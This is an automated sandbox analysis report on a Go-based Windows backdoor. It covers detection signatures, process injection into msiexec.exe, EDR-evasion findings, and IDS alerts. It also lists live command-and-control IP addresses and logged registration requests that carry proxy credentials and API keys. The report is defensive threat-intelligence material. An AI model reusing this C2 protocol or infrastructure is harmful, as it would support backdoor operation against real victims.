Edit tour

Windows Analysis Report
iKhdG3bwZK.exe

Overview

General Information

Sample name:	iKhdG3bwZK.exe renamed because original name is a hash value
Original sample name:	1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211.exe
Analysis ID:	1562117
MD5:	044037796cf2d13eadf0217833d52e65
SHA1:	b2e117be2c836ad18d1edccdd440fe44587b1386
SHA256:	1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211
Tags:	exeTRADETRUSTLLCuser-JAMESWT_MHT
Infos:

Detection

GO Backdoor

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GO Backdoor

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Found Tor onion address

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Uses 32bit PE files

Classification

Process Tree

System is w10x64

iKhdG3bwZK.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\iKhdG3bwZK.exe" MD5: 044037796CF2D13EADF0217833D52E65)

more.com (PID: 6692 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)

conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 6620 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

LogiAiPrompt.exe (PID: 2208 cmdline: "C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe" MD5: 044037796CF2D13EADF0217833D52E65)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security
00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security
00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security
Process Memory Space: msiexec.exe PID: 6620	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security

Sigma Signatures

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 46.8.232.106, DestinationIsIpv6: false, DestinationPort: 30001, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6620, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49745

Suricata Signatures

ETPRO MALWARE Unknown Golang Backdoor Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:32:51.454857+0100	2855478	1	A Network Trojan was detected	192.168.2.4	49745	46.8.232.106	30001	TCP
2024-11-25T08:32:53.161229+0100	2855478	1	A Network Trojan was detected	192.168.2.4	49746	46.8.236.61	30001	TCP
2024-11-25T08:32:54.707596+0100	2855478	1	A Network Trojan was detected	192.168.2.4	49747	91.212.166.91	30001	TCP
2024-11-25T08:32:56.462874+0100	2855478	1	A Network Trojan was detected	192.168.2.4	49749	188.130.206.243	30001	TCP
2024-11-25T08:32:58.717750+0100	2855478	1	A Network Trojan was detected	192.168.2.4	49750	38.180.205.164	30001	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:33:00.211852+0100	2855536	1	A Network Trojan was detected	192.168.2.4	49751	109.172.88.38	14206	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:33:28.896467+0100	2855537	1	A Network Trojan was detected	192.168.2.4	49751	109.172.88.38	14206	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:33:29.364597+0100	2855538	1	A Network Trojan was detected	109.172.88.38	14206	192.168.2.4	49751	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:33:00.211444+0100	2855539	1	A Network Trojan was detected	109.172.88.38	14206	192.168.2.4	49751	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\yrpfhpihdypx

Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Multi AV Scanner detection for submitted file

Source: iKhdG3bwZK.exe

ReversingLabs: Detection: 33%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: iKhdG3bwZK.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: iKhdG3bwZK.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49749 -> 188.130.206.243:30001
Source: Network traffic	Suricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49745 -> 46.8.232.106:30001
Source: Network traffic	Suricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49750 -> 38.180.205.164:30001
Source: Network traffic	Suricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49746 -> 46.8.236.61:30001
Source: Network traffic	Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.88.38:14206 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49751 -> 109.172.88.38:14206
Source: Network traffic	Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49751 -> 109.172.88.38:14206
Source: Network traffic	Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.88.38:14206 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49747 -> 91.212.166.91:30001

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 109.172.88.38 ports 0,1,2,4,6,14206

Found Tor onion address

Source: more.com, 00000001.00000002.2128130638.0000000006290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp
Source: msiexec.exe, 00000007.00000002.2982667967.0000000002C78000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp
Source: yrpfhpihdypx.1.dr	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49750

Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 46.8.232.106:30001
Source: global traffic	TCP traffic: 192.168.2.4:49746 -> 46.8.236.61:30001
Source: global traffic	TCP traffic: 192.168.2.4:49747 -> 91.212.166.91:30001
Source: global traffic	TCP traffic: 192.168.2.4:49749 -> 188.130.206.243:30001
Source: global traffic	TCP traffic: 192.168.2.4:49750 -> 38.180.205.164:30001
Source: global traffic	TCP traffic: 192.168.2.4:49751 -> 109.172.88.38:14206

Source: Joe Sandbox View	IP Address: 46.8.232.106 46.8.232.106
Source: Joe Sandbox View	IP Address: 188.130.206.243 188.130.206.243
Source: Joe Sandbox View	IP Address: 91.212.166.91 91.212.166.91

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: SVINT-ASNES SVINT-ASNES
Source: Joe Sandbox View	ASN Name: MOBILY-ASEtihadEtisalatCompanyMobilySA MOBILY-ASEtihadEtisalatCompanyMobilySA

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 38.180.205.164
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 38.180.205.164
Source: unknown	TCP traffic detected without corresponding DNS query: 38.180.205.164
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 38.180.205.164
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 38.180.205.164
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 38.180.205.164
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.88.38

Source: global traffic	HTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 46.8.232.106:30001User-Agent: Go-http-client/1.1X-Api-Key: PXbyn4MOAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 46.8.236.61:30001User-Agent: Go-http-client/1.1X-Api-Key: OJZULM0YAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 91.212.166.91:30001User-Agent: Go-http-client/1.1X-Api-Key: MeQHYhigAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 188.130.206.243:30001User-Agent: Go-http-client/1.1X-Api-Key: sNxZLFOrAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 38.180.205.164:30001User-Agent: Go-http-client/1.1X-Api-Key: jE9jRK0iAccept-Encoding: gzip

Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243:30001
Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243:30001/api/helper-first-register
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243:30001/api/helper-first-register?
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243:30001sNxZLFOrHTTP/1.1
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001
Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001/api/helper-first-register
Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001/api/helper-first-register2024/11/25
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001/api/helper-first-register?
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13e
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://38.180.205.164:30001jE9jRK0iMon
Source: msiexec.exe, 00000007.00000002.2985258925.000000000E464000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106:30001
Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register
Source: msiexec.exe, 00000007.00000002.2985258925.000000000E40E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?
Source: msiexec.exe, 00000007.00000002.2985258925.000000000E40E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
